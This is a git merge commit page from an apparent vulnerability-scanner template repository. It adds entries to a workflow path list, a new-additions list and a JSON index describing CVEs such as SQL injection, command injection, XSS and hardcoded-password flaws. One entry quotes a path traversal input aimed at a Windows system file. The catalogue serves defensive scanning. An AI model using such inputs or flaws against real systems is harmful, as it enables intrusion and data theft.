Merge branch 'main' into CVE-2024-6781

main
Dhiyaneshwaran 2024-08-01 17:49:37 +05:30 committed by GitHub
commit 731cd94d01
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
223 changed files with 833 additions and 428 deletions

View File

@ -4,14 +4,20 @@ on:
paths: paths:
- '.new-additions' - '.new-additions'
- 'http/cves/2022/CVE-2022-27043.yaml' - 'http/cves/2022/CVE-2022-27043.yaml'
- 'http/cves/2023/CVE-2023-43323.yaml'
- 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2023/CVE-2023-44393.yaml'
- 'http/cves/2023/CVE-2023-5222.yaml'
- 'http/cves/2024/CVE-2024-24763.yaml'
- 'http/cves/2024/CVE-2024-34061.yaml'
- 'http/cves/2024/CVE-2024-39903.yaml' - 'http/cves/2024/CVE-2024-39903.yaml'
- 'http/cves/2024/CVE-2024-39907.yaml' - 'http/cves/2024/CVE-2024-39907.yaml'
- 'http/cves/2024/CVE-2024-6205.yaml' - 'http/cves/2024/CVE-2024-6205.yaml'
- 'http/cves/2024/CVE-2024-6366.yaml' - 'http/cves/2024/CVE-2024-6366.yaml'
- 'http/cves/2024/CVE-2024-6396.yaml' - 'http/cves/2024/CVE-2024-6396.yaml'
- 'http/cves/2024/CVE-2024-6922.yaml' - 'http/cves/2024/CVE-2024-6922.yaml'
- 'http/cves/2024/CVE-2024-7120.yaml'
- 'http/cves/2024/CVE-2024-7188.yaml' - 'http/cves/2024/CVE-2024-7188.yaml'
- 'http/misconfiguration/changedetection-unauth.yaml'
- 'http/misconfiguration/deployment-interface-exposed.yaml' - 'http/misconfiguration/deployment-interface-exposed.yaml'
- 'http/misconfiguration/installer/quickcms-installer.yaml' - 'http/misconfiguration/installer/quickcms-installer.yaml'
- 'http/misconfiguration/manage-cabinet-register.yaml' - 'http/misconfiguration/manage-cabinet-register.yaml'
@ -19,6 +25,7 @@ on:
- 'http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml' - 'http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml'
- 'http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml' - 'http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml'
- 'http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml' - 'http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml'
- 'javascript/misconfiguration/x11/x11-unauth-access.yaml'
workflow_dispatch: workflow_dispatch:
jobs: jobs:
triggerRemoteWorkflow: triggerRemoteWorkflow:

View File

@ -1,12 +1,18 @@
http/cves/2022/CVE-2022-27043.yaml http/cves/2022/CVE-2022-27043.yaml
http/cves/2023/CVE-2023-43323.yaml
http/cves/2023/CVE-2023-44393.yaml http/cves/2023/CVE-2023-44393.yaml
http/cves/2023/CVE-2023-5222.yaml
http/cves/2024/CVE-2024-24763.yaml
http/cves/2024/CVE-2024-34061.yaml
http/cves/2024/CVE-2024-39903.yaml http/cves/2024/CVE-2024-39903.yaml
http/cves/2024/CVE-2024-39907.yaml http/cves/2024/CVE-2024-39907.yaml
http/cves/2024/CVE-2024-6205.yaml http/cves/2024/CVE-2024-6205.yaml
http/cves/2024/CVE-2024-6366.yaml http/cves/2024/CVE-2024-6366.yaml
http/cves/2024/CVE-2024-6396.yaml http/cves/2024/CVE-2024-6396.yaml
http/cves/2024/CVE-2024-6922.yaml http/cves/2024/CVE-2024-6922.yaml
http/cves/2024/CVE-2024-7120.yaml
http/cves/2024/CVE-2024-7188.yaml http/cves/2024/CVE-2024-7188.yaml
http/misconfiguration/changedetection-unauth.yaml
http/misconfiguration/deployment-interface-exposed.yaml http/misconfiguration/deployment-interface-exposed.yaml
http/misconfiguration/installer/quickcms-installer.yaml http/misconfiguration/installer/quickcms-installer.yaml
http/misconfiguration/manage-cabinet-register.yaml http/misconfiguration/manage-cabinet-register.yaml
@ -14,3 +20,4 @@ http/osint/user-enumeration/substack.yaml
http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml
http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml http/vulnerabilities/esafenet/esafenet-noticeajax-sqli.yaml
http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml
javascript/misconfiguration/x11/x11-unauth-access.yaml

View File

@ -2276,6 +2276,7 @@
{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"} {"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"}
{"ID":"CVE-2023-43208","Info":{"Name":"NextGen Healthcare Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43208.yaml"} {"ID":"CVE-2023-43208","Info":{"Name":"NextGen Healthcare Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43208.yaml"}
{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"} {"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
{"ID":"CVE-2023-43323","Info":{"Name":"mooSocial 3.1.8 - External Service Interaction","Severity":"medium","Description":"mooSocial 3.1.8 is vulnerable to external service interaction via multiple parameters in the post function.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-43323.yaml"}
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"} {"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
{"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"} {"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"}
@ -2338,6 +2339,7 @@
{"ID":"CVE-2023-51449","Info":{"Name":"Gradio Hugging Face - Local File Inclusion","Severity":"high","Description":"Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio \u003c 3.33\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-51449.yaml"} {"ID":"CVE-2023-51449","Info":{"Name":"Gradio Hugging Face - Local File Inclusion","Severity":"high","Description":"Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio \u003c 3.33\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-51449.yaml"}
{"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"} {"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"}
{"ID":"CVE-2023-52085","Info":{"Name":"Winter CMS Local File Inclusion - (LFI)","Severity":"medium","Description":"Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-52085.yaml"} {"ID":"CVE-2023-52085","Info":{"Name":"Winter CMS Local File Inclusion - (LFI)","Severity":"medium","Description":"Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-52085.yaml"}
{"ID":"CVE-2023-5222","Info":{"Name":"Viessmann Vitogate 300 - Hardcoded Password","Severity":"critical","Description":"A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5222.yaml"}
{"ID":"CVE-2023-52251","Info":{"Name":"Kafka UI 0.7.1 Command Injection","Severity":"high","Description":"An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-52251.yaml"} {"ID":"CVE-2023-52251","Info":{"Name":"Kafka UI 0.7.1 Command Injection","Severity":"high","Description":"An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-52251.yaml"}
{"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"} {"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"}
{"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"} {"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"}
@ -2416,6 +2418,7 @@
{"ID":"CVE-2024-24112","Info":{"Name":"Exrick XMall - SQL Injection","Severity":"critical","Description":"XMall v1.1 was discovered to contain a SQL injection vulnerability via the 'orderDir' parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-24112.yaml"} {"ID":"CVE-2024-24112","Info":{"Name":"Exrick XMall - SQL Injection","Severity":"critical","Description":"XMall v1.1 was discovered to contain a SQL injection vulnerability via the 'orderDir' parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-24112.yaml"}
{"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} {"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"}
{"ID":"CVE-2024-24565","Info":{"Name":"CrateDB Database - Arbitrary File Read","Severity":"medium","Description":"CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-24565.yaml"} {"ID":"CVE-2024-24565","Info":{"Name":"CrateDB Database - Arbitrary File Read","Severity":"medium","Description":"CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-24565.yaml"}
{"ID":"CVE-2024-24763","Info":{"Name":"JumpServer \u003c 3.10.0 - Open Redirect","Severity":"medium","Description":"JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-24763.yaml"}
{"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"} {"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"}
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
@ -2467,6 +2470,7 @@
{"ID":"CVE-2024-33610","Info":{"Name":"Sharp Multifunction Printers - Cookie Exposure","Severity":"medium","Description":"It was observed that Sharp printers are vulnerable to a listing of session cookies without authentication. Any attacker can list valid cookies by visiting a backdoor webpage and use them to authenticate to the printers.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-33610.yaml"} {"ID":"CVE-2024-33610","Info":{"Name":"Sharp Multifunction Printers - Cookie Exposure","Severity":"medium","Description":"It was observed that Sharp printers are vulnerable to a listing of session cookies without authentication. Any attacker can list valid cookies by visiting a backdoor webpage and use them to authenticate to the printers.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-33610.yaml"}
{"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"}
{"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"}
{"ID":"CVE-2024-34061","Info":{"Name":"Changedetection.io \u003c=v0.45.21 - Cross-Site Scripting","Severity":"medium","Description":"Changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-34061.yaml"}
{"ID":"CVE-2024-34102","Info":{"Name":"Adobe Commerce \u0026 Magento - CosmicSting","Severity":"critical","Description":"Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-34102.yaml"} {"ID":"CVE-2024-34102","Info":{"Name":"Adobe Commerce \u0026 Magento - CosmicSting","Severity":"critical","Description":"Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-34102.yaml"}
{"ID":"CVE-2024-34257","Info":{"Name":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","Severity":"high","Description":"TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-34257.yaml"} {"ID":"CVE-2024-34257","Info":{"Name":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","Severity":"high","Description":"TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-34257.yaml"}
{"ID":"CVE-2024-34351","Info":{"Name":"Next.js - Server Side Request Forgery (SSRF)","Severity":"high","Description":"Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34351.yaml"} {"ID":"CVE-2024-34351","Info":{"Name":"Next.js - Server Side Request Forgery (SSRF)","Severity":"high","Description":"Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34351.yaml"}
@ -2521,6 +2525,7 @@
{"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"} {"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"}
{"ID":"CVE-2024-6746","Info":{"Name":"EasySpider 0.6.2 - Arbitrary File Read","Severity":"medium","Description":"A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \\EasySpider\\resources\\app\\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-6746.yaml"} {"ID":"CVE-2024-6746","Info":{"Name":"EasySpider 0.6.2 - Arbitrary File Read","Severity":"medium","Description":"A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \\EasySpider\\resources\\app\\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-6746.yaml"}
{"ID":"CVE-2024-6922","Info":{"Name":"Automation Anywhere Automation 360 - Server-Side Request Forgery","Severity":"high","Description":"Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6922.yaml"} {"ID":"CVE-2024-6922","Info":{"Name":"Automation Anywhere Automation 360 - Server-Side Request Forgery","Severity":"high","Description":"Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6922.yaml"}
{"ID":"CVE-2024-7120","Info":{"Name":"Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection","Severity":"medium","Description":"A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-7120.yaml"}
{"ID":"CVE-2024-7188","Info":{"Name":"Bylancer Quicklancer 2.4 G - SQL Injection","Severity":"high","Description":"A SQL injection vulnerability exists in the Quicklancer 2.4, GET parameter 'range2', that has time-based blind SQL injection and a boolean-based blind SQL injection, which can be exploited remotely by unauthenticated attacker to execute arbitrary SQL queries in the database.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-7188.yaml"} {"ID":"CVE-2024-7188","Info":{"Name":"Bylancer Quicklancer 2.4 G - SQL Injection","Severity":"high","Description":"A SQL injection vulnerability exists in the Quicklancer 2.4, GET parameter 'range2', that has time-based blind SQL injection and a boolean-based blind SQL injection, which can be exploited remotely by unauthenticated attacker to execute arbitrary SQL queries in the database.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-7188.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
